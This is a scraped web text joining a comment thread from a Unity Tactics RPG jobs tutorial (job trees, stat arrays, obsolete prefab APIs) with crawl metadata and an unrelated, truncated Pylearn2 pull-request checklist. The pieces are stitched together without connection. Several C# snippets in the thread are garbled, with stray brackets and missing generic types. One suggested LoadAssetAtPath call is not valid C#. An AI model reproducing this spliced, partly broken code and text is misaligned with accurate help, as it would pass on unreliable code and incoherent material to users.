I didn’t actually implement the Job Tree in this project, and only hinted about the possibility. You seem to have picked up on the idea just like I’d hoped. I had been imagining something much like what you have suggested – creating new job related stats such as a string for a job name to use for evolution and an integer for the level required to upgrade. Beyond that you would just need to create a system to either observe the level up notifications or to provide a menu that could control the activation etc.
I see, thank you for confirming my thoughts! I ended up making some extra logic to the onlevelup/changed parts, making a new separate joblevellistener script. Attached to a extra GO in my scene in battles to record. Still debating putting a stat on the unit for it or not, as that would be a lot of extra code. Right now I save it to an external file and read from that in a unit selection stage to change the jobs based on level.
I finally got my system working all the way! I took a closer look at what you had on scriptable objects.
I started by making a scrIptable object with the name, and a list of required jobs, then a list of required levels.
I can add any new job, then simply add base requirements of other job levels to unlock it.
I read all the jobs in the resource folder, then check them for the job subreqs. This way I only show currently useable jobs, or soon to be attained jobs for characters in the job change view. Made a simple overlay that when I finish will display the requirements if not met, or be disabled if the job can be selected already.
Now I am looking to improve on the abilities system. I hope to make different skills unlock at different levels in the class. Any suggestions on how to do this? I was thinking I could just read the job level, and have a case statement in my character factory. Check the current job level, find the case for that level range, then add a number to the ability file to load maybe. Lvl 5 mage only knows missile attacks. Lvl 10 knows aoe elemental magic as well. Have to ability SO for the unit. What do you think?
Also am looking at using the same job level to check for a mastered class, and if a class is mastered, be able to equip a second list of abilities. ( No idea what I will do here yet.)
Awesome, congrats! Regarding other tips, I’d suggest opening a new thread in my forums. It’s too much for a nested comment to handle well.
Any reason this wouldn’t work for the LevelUp function?
void LevelUp ()
{
for (int i = 0; i < statOrder.Length; ++i)
{
StatTypes type = statOrder[i];
int growth = Mathf.FloorToInt(growStats[i] + UnityEngine.Random.value);
int value = stats[type];
value += growth;
stats.SetValue(type, value, false);
}
stats.SetValue(StatTypes.HP, stats[StatTypes.MHP], false);
stats.SetValue(StatTypes.MP, stats[StatTypes.MMP], false);
}
Basically instead of juggling variables and doing an if statement I just added the number to the stats and truncated it.
Also I'm still having trouble getting errors at the top of the website. I thought this one was fine, but it's just the home page that isn't having errors.
Warning: count(): Parameter must be an array or an object that implements Countable in ….. on line 284
It seems like there was a purpose to the fractional part of the stat, but to be perfectly honest, I don’t remember why that code is written that way. I know that I was closely following a mechanics guide and that they did things a little weird due to platform limitations etc. Mostly I did this so I didn’t have to put any effort into designing my own systems and could focus merely on getting something working. I would encourage you to feel free to redesign any or all of the systems as you see fit!
I’m not sure why you’re getting errors on the website, but I will try to look into it a bit.
Very soon this web page will be famous amid all blogging people, due to it’s pleasant articles
Hi, How many elements should I be seeing for the stats (script) and should they be named yet in the debug window? (I think no for the second question, but just need to double check. Across all of the hero(clone)s, I see Element 10 and Element 11 at 0, with Element 12, 13, and 14 representing (presumably): speed, mov, and jump. All the other stats also seem accounted for from Element 0 – 9. Everything other than element 10 and 11 are non-zero values that seem to make sense and match the csv at level 1 at least.
Should I be seeing those two elements at a value of 0? they seem extra to me, but nothing else is broken. I’m afraid I left some code snippet in or something that I wasn’t supposed to, but I don’t want to start a grand search just yet since everything else is fine, and I plan to move to the next lesson for now.
There are 15 total elements, indexed from 0 to 14. They are not named when viewed through the Debug inspector other than being listed as “Element 0” etc. The elements at 10 and 11 currently hold the value of 50 for each of the heroes. They are configured on the Jobs prefabs via “Stat Modifier Feature” components – one for each with the Type specified as EVD and RES.
Thanks for the quick response! I’m afraid I must still not be understanding something, as I don’t know where the value 50 gets added to this. From your guidance, and a little backtracking, I now get that those elements came from the StatTypes enumeration, but im still unsure where the value of 50 gets defined or set. it looks like I could manually change the stat in the inspector for an instance on the StatModifierFeature component, but I’m trying to figure out where in the code the value for those two stats of the generated prefab is produced. (The two attributes are not in the CSV’s either from what I am seeing.) I also don’t think I see EVD or RES mentioned in this lesson, so I’m unsure where to look right now.
No, I think you are on top of things. It has been a long time since I made this, so I had to look a little deeper. If I delete the job prefab objects and recreate them in the repository project then they will end up with 0 for those two stats. I probably created the jobs, then added the stats manually (which in the long run is not an ideal way to do it). Good catch!
Ah thanks again for the response and explanation! Everything has been really helpful for me on getting a grasp of how to create my own projects.
So apprantly you cant add components to prefabs anymore… YOu have to do load prefab contents or something. Nobody ran into this problem?
You can still add components to prefabs, they just modified how you view them in the interface. After selecting a prefab click the “Open Prefab” button in the inspector to view its first level contents like normal.
Oh I meant on the code. In the JobParcer script. CreatePrefab I think is the one that is obsolete.
Ah, you’re right, the docs say it is obsolete now: – to bad they don’t also point us to the right place. 🙂
I saw a forum it was like saveassettprefab and loadasassetprefab. I don’t know I couldn’t figure it out. What I have been trying to do is just create the jobs as scriptable objects but I am having trouble getting it to work. Your coding skills are WAY more advanced than mine! I am having trouble learning. Is the whole liquid fire you? I have tried to back up and get better. I am thinking about the CCG tutorial. Any suggestions as to where to start on your website? I read through all of the beginner stuff, I understand most of it.
Yep, pretty much everything on this site is mine (I did borrow simple scripts in some places and give credit then). As far as where to start, that’s a good question. Generally I would have suggested the Tactics RPG because the architectural choices I made (which rely heavily on Unity) are very simple for beginners to understand. It is pretty old by now though and it’s not surprising that some of the content is now obsolete. The Unofficial Pokemon Board Game project was also pretty simple as I made it with my son to help him learn. I can’t comment on whether it will have the same issues.
Each of my tutorial projects use different IDE’s, languages, and even different architectural styles, so you may want to favor whichever topic is most important or interesting to you. Unless you truly grasp all of the material you may find it difficult to apply concepts between the projects because of those differences.
Hello. While going through this excellent tutorial I’ve run into this same issue. I made a few changes to the JobParser script to work around that. I can share my version of the script with you if you like.
For some reason I was unable to reply to the poster below, but would love to see your script @matteo how you changed the job parser.
Perhaps if you have it in google drive or such, but I would like to request you give a link to the methods needed perhaps first. Would be more beneficial to try and learn my way to a useable example and then compare with what you came up with after.
Okay thanks for the advice! I will continue with the rpg then
for anyone that’s getting this error:
Assertion failed on expression: ‘!go.TestHideFlag(Object::kNotEditable)’
UnityEngine.GameObject:AddComponent()
I have made minor alterations to the job parser script. TLF’s approach was deprecated which is causing the issue, you can read more here:.
Script changes the PartsStartingStats function to look like this:
static void PartsStartingStats (string line) {
string[] elements = line.Split (‘,’);
string path = “Assets/Resources/Jobs/” + elements[0].ToString () + “.prefab”;
GameObject obj = null;
if (File.Exists (path)) {
obj = PrefabUtility.LoadPrefabContents (path);
} else {
Debug.Log (string.Format (“load prefab contents did not run. checked location {0}”, path));
obj = GetOrCreate (elements[0]);
}
Job job = obj.GetComponent ();]);
}
Made some more changes to the script so it was stable:
static void PartsStartingStats (string line) {
string[] elements = line.Split (‘,’);
string path = “Assets/Resources/Jobs/” + elements[0].ToString () + “.prefab”;
GameObject obj = null;
if (File.Exists (path)) {
obj = PrefabUtility.LoadPrefabContents (path);
} else {
obj = PrefabUtility.SaveAsPrefabAsset (new GameObject (), path);
obj = PrefabUtility.LoadPrefabContents (path);
}
Job job = obj.GetComponent () ? obj.GetComponent () : obj.AddComponent ();
Debug.Log (string.Format (“object is: {0}. job is {1}”, obj,]);
PrefabUtility.UnloadPrefabContents (obj);
}
static void ParseGrowthStats (string line) {
string[] elements = line.Split (',');
string path = "Assets/Resources/Jobs/" + elements[0].ToString () + ".prefab";
GameObject obj = PrefabUtility.LoadPrefabContents (path);
Job job = obj.GetComponent () ? obj.GetComponent () : obj.AddComponent ();
for (int i = 1; i < elements.Length; ++i)
job.growStats[i – 1] = Convert.ToSingle (elements[i]);
}
cheers
Thanks for sharing 🙂
First off: thanks for putting in all the effort with such a cohesive and easy to understand tutorial series!
As someone coming from more simple scripting in GMS 2.0, I started this series when I swapped to Unity, to help build out a concept for a squad tactics game I’ve always wanted to make. It wouldn’t be an exaggeration to say that I’m learning at least one new concept about programming an entry. Keep up the good work!
Second: are there any architectural changes you would make to this setup if rather than a Final Fantasy style job system, you were modeling something more like a MOBA or the XCOM games, where character and abilities are intrinsic to one another?
Currently I’ve adapted the job components from this tutorial to hold character-specific stats, but before I take it further and start modeling abilities I’m wondering if there isn’t a better method or pattern I’m overlooking.
My specific case is that I’d like each character to have a generic basic attack derived from an equipped weapon, but other than that, a unique name, art, stats, and a pool of abilities, giving each different tactical value in different situations.
Glad you’re enjoying the series. It may be a surprise, but I haven’t played XCOM or similar MOBA games, so I am not familiar with the mechanics you want. I imagine that I would almost certainly make large architectural changes that were specific to the game I wanted to make. I rarely reuse game specific code, and will usually only reuse things like my notification or animation libraries. You will see that is the case if you follow along with my other projects – they all feel very different from each other. If you need specific help, feel free to post in my forums and I’ll do my best.
Ah, I see. I’ll definitely check out the other projects to see how you approached their design challenges once I’m done reading through this one.
As for characters, I’m finding the notification center, exceptions, and component-based design are already excellent patterns for the kind of mechanics I’m looking for.
The only considerable difference between FFT and what I have in mind is that characters have a single unique “job”. That is, they each have a predetermined set of abilities they can unlock. Because of the narrower scope, these abilities can be crafted to synergize tightly with one another, using special resources, applying unique buffs or debuffs, etc. Exceptions seem like a perfect tool for this kind of design.
Anyhow, If I run into any difficulties I’ll be sure to drop by and post!
This might seem like a simple question, but currently I am trying to add a new stat (CRIT) into the current list of stats, however the program refuses to comply, throwing this error as a result:
IndexOutOfRangeException: Array index is out of range.
Job.LoadDefaultStats () (at Assets/Scripts/View Model Component/Actor/Job.cs:58)
FYI, the only pieces of code that I changed are adding the CRIT stat into:
1. StatTypes script
2. the statorder array in Job script
3. JobStartingStats with the necessary values
HOWEVER, I found out that the program runs normally if one of the current existing stat types in the statorder array is replaced by my new CRIT stat.
Any ideas why this is happening?
First let me make sure you understand the error. Let’s say you have an array of integers named “foo” that looks like this: ‘[4, 2, 7]’. The Length of the array is ‘3’ because there are three integers. The index values of each are { 0, 1, 2 }, and I refer to elements in the array by that index, so if I say ‘foo[2]’ I would get the last number in the array which is ‘7’. If I say ‘foo[3]’ I would get an IndexOutOfRangeException because there are no values at that index – we have tried to get a value outside the range of the array.
What that means is that the array that is referenced by the Job script on line 58 is probably smaller than you think it is and you need to understand why. It sounds like you’ve already added the necessary values to most of the necessary places, but don’t forget ‘JobGrowthStats’ and then make sure you don’t forget to run the ‘Pre Production -> Parse Jobs’ menu action as well.
Turns out I forgot to delete the preexisting prefab and run Parse Jobs again. Thanks for the reply though!
Another option for you, instead of a new stat you can derive crit from two other stats, maybe speed and strength? I
Hi, I’ve run into an issue:
“No overloard for method ‘LoadAssetAtPath’ takes ‘1’ arguments”
static GameObject GetOrCreate(string jobName)
{
string fullPath = string.Format(“Assets/Resources/Jobs/{0}.prefab”, jobName);
GameObject obj = AssetDatabase.LoadAssetAtPath(fullPath);
if (obj == null)
obj = Create(fullPath);
return obj;
}
Looking at the definition of the LoadAssetAtPath method it takes a second parameter of ‘Type type’ but I’ve got no idea what that would be.
Version of Unity is 5.0.0f4 Personal.
Thanks for your help.
Wow, that’s an old version of Unity. I guess you went back that far cause that’s how old the tutorial was when I started writing it! I dont know if you are aware, but you can change the version of Unity’s documentation. Though unfortunately even that only goes back to Unity version 5.2.
The non-generic version of LoadAssetAtPath would need you to give type information. In this case, the type of object we are trying to load is a GameObject. So, the line might look like one of these for the second parameter:
GameObject obj = AssetDatabase.LoadAssetAtPath(fullPath, GameObject);
GameObject obj = AssetDatabase.LoadAssetAtPath(fullPath, typeof(GameObject));
And may also need either a prefix or post fix cast like one of these:
GameObject obj = (GameObject)AssetDatabase.LoadAssetAtPath(fullPath, typeof(GameObject));
GameObject obj = AssetDatabase.LoadAssetAtPath(fullPath, typeof(GameObject)) as GameObject;
Hope that helps!
Thanks for the response. I’d actually found a workaround using Resources.Load, so
GameObject obj = Resources.Load(fullPath, typeof(GameObject)) as GameObject;
but it looks like
GameObject obj = (GameObject)AssetDatabase.LoadAssetAtPath(fullPath, typeof(GameObject));
works as well, so I’ll go with that.
Thanks for your help.
Oh and yeah I’ve gotten stuck with tutorials before due to version changes, so I figured I’d go with the same version of Unity you did the tutorial in.
|
http://theliquidfire.com/2015/08/10/tactics-rpg-jobs/
|
CC-MAIN-2020-24
|
refinedweb
| 6,721
| 64.61
|
27 July 2011 07:13 [Source: ICIS news]
By Nurluqman Suratman
?xml:namespace>
SINGAPORE
The fire, the fifth such incident at the complex this year, broke out at a section of a hydrogen pipeline in the vicinity, sources said.
“There was a small fire, but it did not damage any plants,” a spokesperson from Formosa Petrochemical Corp (FPCC) said, adding that the firm’s 1.03m tonne/year No 2 and 1.2m tonne/year No 3 crackers at the complex are running at full capacity.
However, Formosa Plastics Corp (FPC) had to shut its polyethylene (PE) and ethylene vinyl acetate (EVA) units at the complex as a cautionary measure, an FPC source said.
“Plant operators are very careful nowadays because there’ve been so many fires over the past months,” the FPC source said.
The affected facilities comprise a 264,000 tonne/year linear low density PE (LLDPE) plant, a 350,000 tonne/year high density PE (HDPE) unit and a 240,000 tonne/year low density PE (LDPE)/EVA swing plant, the source added.
“We have no idea how long the plant will remain shut because the situation is unclear,” the source said.
China-based traders said there may be some impact on the EVA market if the outage at FPC’s EVA plant is prolonged beyond a week.
“A week-long outage should not have any impact on the market because demand for EVA from the downstream footwear and hot melt adhesives industries lacks force,” the source said.
Among other units at the complex, production at Formosa BP Chemicals Corp’s (FBPC) 300,000 tonne/year acetic acid plant at Mailiao was unaffected by the fire and is operating at full capacity, a company official said.
Formosa BP Chemicals (FBPC) is an equally owned joint venture between BP and Formosa Chemicals and Fibre Corporation.
Nan Ya Plastics’ four monotheylene glycol (MEG) units in Mailiao, which have a combined capacity of 1.8m tonnes/year, are also running "normally" at 85-90% following the fire, sources said.
“There has been no impact at all on our factories [from the fire], but we still need to check with FPCC if their plants will be running normally,” said David Tsou, a spokesperson at the investor relations department of Nan Ya Plastics.
FPC's ethylene dichloride (EDC), vinyl chloride monomer (VCM), polyvinyl chloride (PVC) and caustic soda plants are also unaffected by the fire and the company has no plans to shut any of the units, according to a company source.
The company’s 98,000 tonne/year methyl methacrylate (MMA) acetone cyanohydrin-based unit in Mailiao is also running at full tilt, a company source said.
FPC shut its 100,000 tonne/year ECH unit at the site immediately after the fire, but has scheduled to restart it on 27 July, according to a company source.
A pipeline fire at the complex on 12 May had forced FPCC to shut its 700,000 tonne/year No 1 cracker and downstream 109,000 tonne/year butadiene (BD) extraction unit for inspection, while the local government in Yunlin county ordered Nan Ya Plastics to shut five units at its nearby Haifung factory for safety review.
While Nan Ya Plastics has gained approval to restart its 360,000 tonne/year No 3 and 720,000 tonne/year No 4 MEG plants at Haifung, three other units remain shut pending approval from the local government, according to Tsou.
Formosa Chemicals & Fibre Corp (FCFC) was also ordered to shut its No 1 aromatics unit, which can produce 150,000 tonnes/year of benzene, 100,000 tonnes/year of isomer-grade mixed xylenes and 270,000 tonnes/year of paraxylene (PX), following the blaze on 12 May.
Earlier this week, Yunlin county officials were expected to give FCFC permission to restart the No 1 unit soon, but 26 July fire may potentially delay the approval process, sources said.
The company’s No 2 and No 3 aromatics unit at the site are unaffected by the 26 July fire.
FPCC was also originally scheduled to restart its No 1 cracker in Mailiao this week, but the incident may potentially derail the company’s restart plans, sources said.
FPCC had earlier said it planned to restart the No 1 cracker before the turnaround at its No 3 cracker to prevent feedstock shortage for its derivative facilities.
The No 3 cracker is scheduled to be shut for a 40-45 day turnaround in the middle of August, but it is not clear if this will be postponed, sources said.
Traders and end-users said it is still too early to say whether there will be any impact on BD pricing because details on the impact of the fire is still unclear.
“Maybe Formosa may delay or cancel some BD cargoes and BD prices may go up, but it is too early to say,” a Japanese trader said.
“Even if Formosa were to cancel or delay their BD shipments, there is a lot of supply from China and we don’t see any serious shortage or impact on the BD market,” an end-user said.
Asia BD prices fell to $4,100-4,150/tonne (€2,829-2,864/tonne) CFR (cost & freight) NE (northeast) Asia on 22 July, down by $150/tonne from an all-time high of $4,250-4,300/tonne CFR NE Asia on 15 July.
Additional reporting by Peh Soo Hwee, Chow Bee Lin, Feliana Widjaja, Loh Bohan, Mahua Chakravarty, Helen Lee, Helen Yan, Gabriel Yip, Judith Wang and Junie Lin
($1 = €0
|
http://www.icis.com/Articles/2011/07/27/9480137/taiwans-formosa-restart-plans-may-get-delayed-by-fire.html
|
CC-MAIN-2013-48
|
refinedweb
| 928
| 61.09
|
{- Copyright (C) 2005-2009.Types Copyright : Copyright (C) 2005-2009 John Goerzen License : GNU LGPL, version 2.1 or above Maintainer : John Goerzen <jgoerzen@complete.org> Stability : provisional Portability: portable Types for HDBC. Please note: this module is intended for authors of database driver libraries only. Authors of applications using HDBC should use 'Database.HDBC' exclusively. Written by John Goerzen, jgoerzen\@complete.org -} module Database.HDBC.Types (IConnection(..), Statement(..), SqlError(..), nToSql, iToSql, posixToSql, fromSql, safeFromSql, toSql, SqlValue(..), ConnWrapper(..), withWConn ) where import Database.HDBC.Statement import Database.HDBC.ColTypes import Control.Exception ( finally ) {- |. -} class IConnection conn where {- | 'Statement's active. In more precise language, the results in such situations are undefined and vary by database. So don't do it. -} disconnect :: conn -> IO () {- | Commit any pending data to the database. Required to make any changes take effect. -} commit :: conn -> IO () {- | Roll back to the state the database was in prior to the last 'commit' or 'rollback'. -} rollback :: conn -> IO () {- | Execute an SQL string, which may contain multiple queries. This is intended for situations where you need to run DML or DDL queries and aren't interested in results. -} runRaw :: conn -> String -> IO () runRaw conn sql = do sth <- prepare conn sql _ <- execute sth [] `finally` finish sth return () {- | Execute a single SQL query. Returns the number of rows modified (see 'execute' for details). The second parameter is a list of replacement values, if any. -} run :: conn -> String -> [SqlValue] -> IO Integer {- |. -} prepare :: conn -> String -> IO Statement {- |. -} clone :: conn -> IO conn {- |cDriverName :: conn -> String {- |. -} hdbcClientVer :: conn -> String {- | In the case of a system such as ODBC, the name of the database client\/server in use, if available. For others, identical to 'hdbcDriverName'. -} proxiedClientName :: conn -> String {- | In the case of a system such as ODBC, the version of the database client in use, if available. For others, identical to 'hdbcClientVer'. This is the next layer out past the HDBC driver. -} proxiedClientVer :: conn -> String {- | The version of the database server, if available. -} dbServerVer :: conn -> String {- |. -} dbTransactionSupport :: conn -> Bool {- |. -} getTables :: conn -> IO [String] {- |. -} describeTable :: conn -> String -> IO [(String, SqlColDesc)] {- |'. -} data ConnWrapper = forall conn. IConnection conn => ConnWrapper conn {- | Unwrap a 'ConnWrapper' and pass the embedded 'IConnection' to a function. Example: >withWConn wrapped run $ "SELECT * from foo where bar = 1" [] -} withWConn :: forall b. ConnWrapper -> (forall conn. IConnection conn => conn -> b) -> b withWConn conn f = case conn of ConnWrapper x -> f x instance IConnection ConnWrapper where disconnect w = withWConn w disconnect commit w = withWConn w commit rollback w = withWConn w rollback run w = withWConn w run prepare w = withWConn w prepare clone w = withWConn w (\dbh -> clone dbh >>= return . ConnWrapper) hdbcDriverName w = withWConn w hdbcDriverName hdbcClientVer w = withWConn w hdbcClientVer proxiedClientName w = withWConn w proxiedClientName proxiedClientVer w = withWConn w proxiedClientVer dbServerVer w = withWConn w dbServerVer dbTransactionSupport w = withWConn w dbTransactionSupport getTables w = withWConn w getTables describeTable w = withWConn w describeTable
|
http://hackage.haskell.org/package/HDBC-2.2.6/docs/src/Database-HDBC-Types.html
|
CC-MAIN-2015-11
|
refinedweb
| 470
| 52.15
|
Set include path for Qt moc files using CMake
I'm trying to use CMake with Qt to deploy on Linux and Windows, but I can't manage to make a basic project architecture, with an src and include directory. Here's an example :
. ├── CMakeLists.txt ├── include │ └── LoginUI.hpp └── src ├── login.ui ├── LoginUI.cpp └── main.cpp
Here's the content of my CMakeLists.txt
cmake_minimum_required(VERSION 2.8.11) project(testproject) set(SRCS src/main.cpp src/LoginUI.cpp) set(INCLUDE_DIR include .) set(HEADERS include/LoginUI.hpp) if (UNIX) set(CMAKE_PREFIX_PATH "/opt/Qt5.9.2/5.9.2/gcc_64/lib/cmake") endif (UNIX) # Find includes in corresponding build directories set(CMAKE_INCLUDE_CURRENT_DIR ON) # Instruct CMake to run moc automatically when needed. set(CMAKE_AUTOMOC ON) set(CMAKE_AUTOUIC ON) # Find the QtWidgets library find_package(Qt5Widgets) # Tell CMake to create the helloworld executable add_executable(helloworld ${SRCS}) target_include_directories(helloworld PUBLIC ${INCLUDE_DIR}) # Use the Widgets module from Qt 5. target_link_libraries(helloworld Qt5::Widgets)
When I run cmake, it works perfectly, but when I try to run 'make', there's an error showing that it searches for a header (here, LoginUI.hpp) in the 'src/' directory. I want it to search in the 'include/' directory. Is it possible ?
Here's the exact error message :
[ 20%] Automatic moc and uic for target helloworld AUTOGEN: error: .../src/LoginUI.cpp The file includes the moc file "moc_LoginUI.cpp", but could not find header "LoginUI{.h,.hh,.h++,.hm,.hpp,.hxx,.in,.txx}" in .../src/
Thanks for your answer, it worked nicely !
|
https://forum.qt.io/topic/84644/set-include-path-for-qt-moc-files-using-cmake
|
CC-MAIN-2018-13
|
refinedweb
| 251
| 52.56
|
2692/how-can-use-blockhain-for-storing-proof-document-such-image
Yes, you're right. Saving entire image in eth is very costly. I'll suggest you to check off chain data storages like IPFS or Swarm (the ethereum community usually recommends it).
There are alternative APIs are available. Mentioned are two popular services and most of dev's are using. Both are distributed off chain storages.
I'll suggest you to check below link once.
Coming to your question. This is an example of how to store a reference to an image, stored in IPFS, in an ethereum smart contract.
contract ImageInfo{
mapping(address=>Image[]) private images;
struct Image{
string imageHash;
string ipfsInfo;
}
function uploadImage(string hash, string ipfs) public{
images[msg.sender].push(Image(hash,ipfs)); //
}
}
Above code is for just illustration. Modify the data structure as per your requirements. I have not added any security checks.
The idea is to first upload the image to ipfs/swarm/any other off chain data store, get the value calculate hash of image to contract. Download data(image) from offchain and calculate hash and check hash saved in contract.
I feel like the above solution is one of the best way to handle images, because all data is distributed using serverless architecture.
If you are looking for a blockchain to store data in it, then bitcoin would not be a good choice. Ethereum or Hyperledger is ideal for developing such POC(prof of concept) Or you can use Elements blockchain platform which is a feature experiment and an extension to bitcoin protocol. Here's the github link you can refer
See this can be achieved in more ...READ MORE
Bitcoin was the first implementation of blockchain, ...READ MORE
You can use an already existing Blockchain. ...READ MORE
There are two ways to actually do ...READ MORE
This was a bug. They've fixed it. ...READ MORE
Summary: Both should provide similar reliability of ...READ MORE
yes all are over TCP/IP connections secured by TLS encryption in hashgraph architecture-hashgraph, ...READ MORE
With any approach, you need a bitcoin ...READ MORE
This is what I used:
package main
import (
...READ MORE
OR
Already have an account? Sign in.
|
https://www.edureka.co/community/2692/how-can-use-blockhain-for-storing-proof-document-such-image
|
CC-MAIN-2021-21
|
refinedweb
| 368
| 68.16
|
Hi Stuart, Stuart Bishop wrote:
What were the problematic bits?
Advertising# Disgusting hack to use our extended config file schema rather than the # Z3 one. TODO: Add command line options or other to Z3 to enable overriding # this -- StuartBishop 20050406 from zdaemon.zdoptions import ZDOptions ZDOptions.schemafile = os.path.abspath(os.path.join( os.path.dirname(__file__), 'lib', 'canonical', 'config', 'schema.xml')) Also, there is only one schema.xml so multiple components can't each insert their own blob of configuration information into the global schema.
Okay, so I can see two potential problems here:1. Zope 3's schema.xml has the same problem that Zope 2's used to have - no generic multisection where other frameworks/products/whatever can insert their own bits of configuration. I suspect fixing that schema.xml (which involves inserting one or two lines ;-) would remove the need for your monkeypatch above.
2. Are you aware of the component.xml stuff that Dieter referred to?
We lost a fair bit of flexibility doing it this way. Field validation needs to be done the ZConfig way.How would you prefer to do it?Validation of the entire config file, and if there are one or more errors output a readable report at the end with error messages returned by the validators. The current mechanism just spits out exceptions, which is really bad for configuration files aimed at end users.
Agreed, this is something that could be added to ZConfig. Or Zope 3 could catch those exceptions and morph them into useful messages. Admittedly, you wouldn't get all the errors though, so ZConfig could do with some enhancement here...Agreed, this is something that could be added to ZConfig. Or Zope 3 could catch those exceptions and morph them into useful messages. Admittedly, you wouldn't get all the errors though, so ZConfig could do with some enhancement here...
If I have a non-required section foo, containing a non-required key bar, if I try and access config.foo.bar I get an AttributeError. I should get the default value for bar.
Okay, probably a bug. Have you reported this to the ZConfig author(s)?
My main gripe with the .ini format is the lack of hierarchy, but then I worry that with XML we'll suffer from an overly complex schema...Why would you want a schema for the XML?
xml freaks like schemas ;-)Although I actually probably should have said "I worry that we'll end up with overly complex and badly structured xml *cough*zcml*cough*...
- validation handlers would be registered for a particular XML namespace
...yay! we love namespaces *sigh*
- Config file is loaded into a set of data structures, one for each XML namespace
That's not a bad idea though...
- warnings are emitted if there are XML namespaces loaded that don't have a validator.
Why? If people don't want validators, don't force them...
Of course, .ini would be able to emit more meaningfull error messages: foo/bar/1 in section [whatever] is required, but not found blah/whatever in section [whatever] is not a valid url section [baz] is required but does not exist.
I'm all for just fixing the bugs in ZConfig and I think you'll be happy enough. Not sure it's worth the huge upheavels :-SI'm all for just fixing the bugs in ZConfig and I think you'll be happy enough. Not sure it's worth the huge upheavels :-S
cheers, Chris -- Simplistix - Content Management, Zope & Python Consulting - _______________________________________________ Zope3-dev mailing list Zope3-dev@zope.org Unsub:
|
https://www.mail-archive.com/zope3-dev@zope.org/msg04936.html
|
CC-MAIN-2018-09
|
refinedweb
| 600
| 66.74
|
Pylearn2 Pull Request Checklist¶
Last updated: June 8, 2014
This is a preliminary list of common pull request fixes requested. It’s presumed that your pull request should already pass the Travis buildbot, including docstring and code formatting checks.
- Are you breaking a statement over multiple lines?
- Do tests exist for the code you’re modifying?
- Are you fixing a bug? Did you add a regression test?
- Are you fixing an issue that is on the issue tracker?
- Have you squashed out any nuisance commits?
- Are you using OrderedDict where necessary? Are you iterating over sets?
- Are you using print statements?
- Are you creating a sequence and then immediately iterating over it?
- Are you using zip()/izip() on sequences you expect to be the same length?
- Are you using the dict/OrderedDict methods keys()/values()/items()?
- Are you updating a dictionary or OrderedDict with .update()?
- Do you have an except: block?
- Are you checking to see if an argument is iterable?
- Are you checking if something is a string?
- Are you checking if something is a number?
- Are you creating Theano functions?
- Are you creating Theano shared variables?
- Are you casting symbols/constants to a Theano floating point type?
- Do you have big nested loops for generating a Cartesian product?
- Are you generating combinations or permutations of a set (or list, ...)?
- Are you overriding methods in your class?
- Are you writing functions that uses pseudo-random numbers?
- Are you assembling filesystem paths with dir + / + filename or similar?
- Are you extracting the directory name or base filename from a file path?
- Are you opening/closing files?
- Are you adding new files or changing files permissions?
Are you breaking a statement over multiple lines?¶
Python supports breaking a logical line over multiple file lines in a number of ways. One is to use backslashes before the line ending. Another is to enclose the broken section is parentheses (), ([] also works but you should only use this if you are otherwise creating a list). Note that if you have open parentheses from a function call you do not need additional parentheses.
In Pylearn2 we generally prefer parentheses, because it means there’s less markup to maintain and leads to less spurious errors.
Yes:
assert some_complicated_conditional_thing, ( "This is the assertion error on a separate line." )
No:
assert some_complicated_conditional_thing, \ "This just gets annoying, especially if there are multiple " \ "lines of text."
Note that string concatenation across lines is automatic, no need for +. If enclosed in parentheses you don’t need a either:
# Valid Python. print ("The quick brown fox jumps over the lazy dog. And then " "the fox did it again.")
See the PEP8 indentation recommendations for how to arrange indentation for continuation lines.
Do tests exist for the code you’re modifying?¶
Pylearn2 grew rapidly in the beginning, often without proper attention to testing. Modifying a piece of code in the codebase may alter how it works; if you make such a modification, you should not only verify that tests pass but that tests _exist_ for the piece of code you’re modifying. You should verify that those tests exist and update them as needed, including a test case for the behaviour you’re adding or modifying.
Usually tests for a module foo are found in tests/test_foo.py.
Are you fixing a bug? Did you add a regression test?¶
Tests that test for previously existing bugs are particularly critical, as further modification of the code may reintroduce the bug by those who are not aware of the subtleties that led to it in the first place.
Are you fixing an issue that is on the issue tracker?¶
Your pull request description (or a commit message for one of the commits) should include one of the supported variants of the syntax so that the issue is auto-closed upon merge.
Have you squashed out any nuisance commits?¶
Pull requests with lots and lots of tiny commits are hard to review. Lots of commits that subsequently introduce a minor bug and then fix them can also make bisecting a pain.
Your final pull request should comprise as few commits as logically make sense. Each commit should ideally leave the repository in a working state (tests passing, functionality preserved).
You can squash commits using git rebase -i and following the instructions. Note that you will have to git push –force origin my_branch_name after a rebase.
You should squash to a minimal set of semantically distinct commits before asking for a review, and then possibly squash again if you’ve made lots of commits in response to feedback (note that you can reorder the commits in the editor window given by git rebase -i).
Are you using OrderedDict where necessary? Are you iterating over sets?¶
The order of iteration over dictionaries in Python is not guaranteed to remain the same across different invocations of the same program. This is a result of a randomized hashing algorithm and is actually an important security feature for preventing certain kinds of Denial-of-Service attacks. Unfortunately, where such data structures are employed in scientific simulations, this can pose reproducibility problems.
The main reason for this is that computations in floating point do not precisely obey the typical laws of arithmetic (commutativity, associativity, distributivity), and slight differences in the order of operations can introduce small differences in result, which can have butterfly effects that significantly alter the results of a long-running job. The order of operations can be altered by the order in which a Theano graph is assembled, and the precise form it takes can unfortunately sometimes alter which compile-time graph optimizations are performed.
In order to stamp out inconsistencies introduced by an unpredictable iteration order, we make extensive use of the OrderedDict class. This class is part of the collections module in Python 2.7 and Python 3.x, however, in order to maintain Python 2.6 compatibility, we import it from theano.compat.python2x, which provides an equivalent pure-Python implementation if the built-in version is not available.
You should consider carefully whether the iteration order over a dictionary you’re using could result in different behaviour. If in doubt, use an OrderedDict. For the updates parameter when creating Theano functions, you _must_ use an OrderedDict, or a list of (shared_variable, update_expression) tuples.
When iterating over sets, consider whether you should first sort your set. The sorted() built-in function is a simple way of doing this.
Are you using print statements?¶
In most cases you should be using logging statements instead. You can initialize a logger in a new module with:
import logging log = logging.getLogger(__name__)
And subsequently call into it with log.info(), log.warning(), etc.
Are you creating a sequence and then immediately iterating over it?¶
If so, consider using the faster and more memory efficient versions.
- xrange instead of range.
- from theano.compat.six.moves import zip as izip instead of zip. This import is for Python 3 compatibility.
Are you using zip()/izip() on sequences you expect to be the same length?¶
Note that zip and izip truncate the sequence of tuples they produce to the length of the shortest input sequence. If you expect, as is often the case, that the sequences you are zipping together should be the same length, use safe_zip or safe_izip defined in pylearn2.utils.
Also see itertools.izip_longest if you want to zip together sequences of unequal length with a fill value.
Are you using the dict/OrderedDict methods keys()/values()/items()?¶
For values() and items() consider whether itervalues() or iteritems() would be more appropriate, if you’re only iterating over them once, not keeping the result around for any length of time, and don’t need random access.
